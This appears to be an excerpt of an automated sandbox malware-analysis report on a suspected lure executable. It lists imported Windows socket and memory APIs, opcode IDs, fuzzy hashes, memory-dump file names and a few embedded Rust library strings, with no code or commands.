                                                                                                          • Instruction Fuzzy Hash: 0831A332B06B1084FB109B62E8013ADA775FB88BE4F598535DE5C17BE8DE78D492C720
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: setsockopt
                                                                                                          • String ID:
                                                                                                          • API String ID: 3981526788-0
                                                                                                          • Opcode ID: 4837b3b544b99ebb4d50bf72685fe4c3bb9012ef80579a8bf206172ecb1d01e5
                                                                                                          • Instruction ID: 14448fbbb576fc744a612bb49f07d3aeb72784b6e21febf6163f4366aefb6c48
                                                                                                          • Opcode Fuzzy Hash: 4837b3b544b99ebb4d50bf72685fe4c3bb9012ef80579a8bf206172ecb1d01e5
                                                                                                          • Instruction Fuzzy Hash: EF014521E1650186F724A7B898411785260AB50734FF50BB0CA3C466F0DE7CD6F3CF20
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CurrentDescription
                                                                                                          • String ID:
                                                                                                          • API String ID: 654298328-0
                                                                                                          • Opcode ID: 0ec1f48c9c70d866e37d59edaf9279abf0643e42e6843219d37eb76699740e67
                                                                                                          • Instruction ID: 78d7b462236829b53d42e076168b3c495e8cc8a12adb449e6e74f62ea89d43c4
                                                                                                          • Opcode Fuzzy Hash: 0ec1f48c9c70d866e37d59edaf9279abf0643e42e6843219d37eb76699740e67
                                                                                                          • Instruction Fuzzy Hash: 98017552F0A96184FB10F761D8113FC97216B15FE8F854072DE0E27FA9DE68D956CB20
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 3077cf95d4296c58ba6e37fd5c264ac2f98c9c195409ce5b9069c661cb1118a8
                                                                                                          • Instruction ID: 1c16642d5385e27477e5b4dfadee355eea1df6dc37f23cac1fab0f8c2ae4a6aa
                                                                                                          • Opcode Fuzzy Hash: 3077cf95d4296c58ba6e37fd5c264ac2f98c9c195409ce5b9069c661cb1118a8
                                                                                                          • Instruction Fuzzy Hash: FA213D33B0AA1198FB11EF61E8401ACA375B7047B8F954471DE9D13A98DF78D5A2C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: closesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2781271927-0
                                                                                                          • Opcode ID: c9b5198d7573b6e6375e097572ad1dff32bf619b8de695991b6fd05a6e8c0177
                                                                                                          • Instruction ID: 88b6a144e7d4c1d29f2309ed74020cacac22ac683fa13bdd7af74874fcef507f
                                                                                                          • Opcode Fuzzy Hash: c9b5198d7573b6e6375e097572ad1dff32bf619b8de695991b6fd05a6e8c0177
                                                                                                          • Instruction Fuzzy Hash: 6211AB12A0E50281FB217B16E44067EA320EF4CFA5FC66131DF5D076E3DE6CE4968B60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 38366605-0
                                                                                                          • Opcode ID: 947d68e0649672b6ffd0a29b0c1d5de9d632312e7318e90f01903d17963b5562
                                                                                                          • Instruction ID: 6e9e30639e9996b67e58147618c375b1f5411d5d3f4626de4bf89c9e6362a216
                                                                                                          • Opcode Fuzzy Hash: 947d68e0649672b6ffd0a29b0c1d5de9d632312e7318e90f01903d17963b5562
                                                                                                          • Instruction Fuzzy Hash: A9012672F1A24141FB50AB25A840766A682AFD47B8FD64334E86D07BF4CEBCD885CF50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesContextQuery
                                                                                                          • String ID:
                                                                                                          • API String ID: 1320229847-0
                                                                                                          • Opcode ID: a47fb397a9a9abcb8482499bd46ae28487c273ce0de91237d0fa12ae05c45a31
                                                                                                          • Instruction ID: 0664351677c854c460ccadf72b493b7018cbbe29c315b97fcef0d44da258b002
                                                                                                          • Opcode Fuzzy Hash: a47fb397a9a9abcb8482499bd46ae28487c273ce0de91237d0fa12ae05c45a31
                                                                                                          • Instruction Fuzzy Hash: AAE0EC59B06A8683FB249A11A84235652A2B7CD384FE5A161D5C84374DCE3CC66A9F60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ioctlsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 3577187118-0
                                                                                                          • Opcode ID: 77b02217d670554558e134cb971ceaf0f2f4a000b679474b9e7aacc0686b6abe
                                                                                                          • Instruction ID: 7a17676b617b1f363948116fc4d2bc997be838305c03bd84cc6302419d0db154
                                                                                                          • Opcode Fuzzy Hash: 77b02217d670554558e134cb971ceaf0f2f4a000b679474b9e7aacc0686b6abe
                                                                                                          • Instruction Fuzzy Hash: B6D02B26F0690182E7247B7354810BA62E0ABD8B74FE106B1D15C813E0EE6CD6BACF30
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: connect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1959786783-0
                                                                                                          • Opcode ID: 9e3a4cce0598d31bf86c6311aa514ab99d0e62593e3be0340b324ab6e726e8d2
                                                                                                          • Instruction ID: 82ed75115c897f340c5bd8cda75a76b1da51a3bf9a4d1a7e1bf4b44e63367fe0
                                                                                                          • Opcode Fuzzy Hash: 9e3a4cce0598d31bf86c6311aa514ab99d0e62593e3be0340b324ab6e726e8d2
                                                                                                          • Instruction Fuzzy Hash: 89D0A715F2290182FB143B63988222452507B58B90FD54470C50CC2320ED5CD5F58F30
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: e7abc4e81d0b8719a234f344291b7b7e90d897994fe89d24a565499be0dbfa1a
                                                                                                          • Instruction ID: 361619b444b2706291e18c7436926e845f5c15f1585b1cccb8f7283621fccdc9
                                                                                                          • Opcode Fuzzy Hash: e7abc4e81d0b8719a234f344291b7b7e90d897994fe89d24a565499be0dbfa1a
                                                                                                          • Instruction Fuzzy Hash: 9A31AD3270ABC192E74AEB20E9003E9A7A4FB457A0F814521DF6D073A2DF7CE164D710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 63121f9eb55cc1dd6f82dcbc465c70b1e8571f9f27be633e7e05a210960f0f47
                                                                                                          • Instruction ID: 681ab14a8c9f9b6f6495e809be4975b666e1799240ed4e5c4ac4d3b3327ac7bd
                                                                                                          • Opcode Fuzzy Hash: 63121f9eb55cc1dd6f82dcbc465c70b1e8571f9f27be633e7e05a210960f0f47
                                                                                                          • Instruction Fuzzy Hash: D2018C7261D78185F710DB14E40439AEBA1EBC6788F404125EA8807EAADFBEE084CF50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 5141a793416950b6493c8b9411dc978abf421040dcb98bd375b8fa13c15c2109
                                                                                                          • Instruction ID: a311e7b51e91fa21bc9956211db0014b302f6f912e2bff77a86a3eeea06bca3d
                                                                                                          • Opcode Fuzzy Hash: 5141a793416950b6493c8b9411dc978abf421040dcb98bd375b8fa13c15c2109
                                                                                                          • Instruction Fuzzy Hash: A0F0891371B50684F742AB05F440279D320A784BE1FC65072DD4D43AB5DD7CD0C6C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 25865d4da307678db6952027554288842c355952b6532fe025f2ee24146e4800
                                                                                                          • Instruction ID: 17d1e2bccbc77841590cfda2c5ac9debab993c9d59c4f2766d903b33ce16acef
                                                                                                          • Opcode Fuzzy Hash: 25865d4da307678db6952027554288842c355952b6532fe025f2ee24146e4800
                                                                                                          • Instruction Fuzzy Hash: 83E0657270974691FB15EB45E040399E320F785794F805031DB49066A6DFBCE195CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 4edd8701f2be56e6eb69ca4962088f569e56feaa739e675bf8b48cfaaccb6de0
                                                                                                          • Instruction ID: 1fde9f2dddb3ac857d35d6e715d8523a5126c0896193bba80b7fd620c0b892b7
                                                                                                          • Opcode Fuzzy Hash: 4edd8701f2be56e6eb69ca4962088f569e56feaa739e675bf8b48cfaaccb6de0
                                                                                                          • Instruction Fuzzy Hash: 7BE0DF12A1642082F3652316A0401B892109B88B30EA9A330CABE16AE0CD69ECC34B00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: a35f06d41a64e4d9019d80045d054b6b1c524babe16e4defdc7750bbefa0a5ed
                                                                                                          • Instruction ID: ca65c107651d3b0f97d29247cfcef259a4db5130db062385a9cf2b23c78d266c
                                                                                                          • Opcode Fuzzy Hash: a35f06d41a64e4d9019d80045d054b6b1c524babe16e4defdc7750bbefa0a5ed
                                                                                                          • Instruction Fuzzy Hash: 64E086213043C951E7349A22E400BD99B10BB5BBC4F8840319D8C17B46CF6CD119CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: core thread panicked$reqwest::blocking::clientsignaled close for runtime thread ($reqwest::blocking::wait) park timeout $tx only taken on error
                                                                                                          • API String ID: 2162964266-895053394
                                                                                                          • Opcode ID: a1722f45b17ce4b708f9260c4be9cadeec5e44c83404632ba887c72c7445dc16
                                                                                                          • Instruction ID: c420097cd1e86979cbc3637a5b2561aa22ee921e7adef995b80dfbd344ccc089
                                                                                                          • Opcode Fuzzy Hash: a1722f45b17ce4b708f9260c4be9cadeec5e44c83404632ba887c72c7445dc16
                                                                                                          • Instruction Fuzzy Hash: 11F25F3260EBC181F7B1AB10E4403EAA3A4FB89754F815135DA8D43BAADF7CE595CB50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovememset
                                                                                                          • String ID: arenegyl$arenegyl$modnarod$modnarod$setybdet$setybdet$uespemos$uespemos
                                                                                                          • API String ID: 1288253900-1116813384
                                                                                                          • Opcode ID: a29d1b05c0d31ad183b3518f7e459a90c9a73fb0deb177ccc541383ecbd90984
                                                                                                          • Instruction ID: 0b9a5d6e682f401a064978d211d406a48153e03190da84e8bf965c9e831cbccd
                                                                                                          • Opcode Fuzzy Hash: a29d1b05c0d31ad183b3518f7e459a90c9a73fb0deb177ccc541383ecbd90984
                                                                                                          • Instruction Fuzzy Hash: DF52AA5370A7E445E7429F39605897B7F68E7127A0F4A86A6EFED03382DA3CC645C720
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 2568d8f866fce035f691c69be92cb474582c6d51cfccaafb2d030b7b976fe032
                                                                                                          • Instruction ID: 857534c40b12e226f5ebb8e8c96af23438cfbbef6ce279ecae0b43a84de8e39b
                                                                                                          • Opcode Fuzzy Hash: 2568d8f866fce035f691c69be92cb474582c6d51cfccaafb2d030b7b976fe032
                                                                                                          • Instruction Fuzzy Hash: F9A2E822A0A79542F760DB25E4403AAB360FB99B94F419131DFDD07BA6DF7CE192CB10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
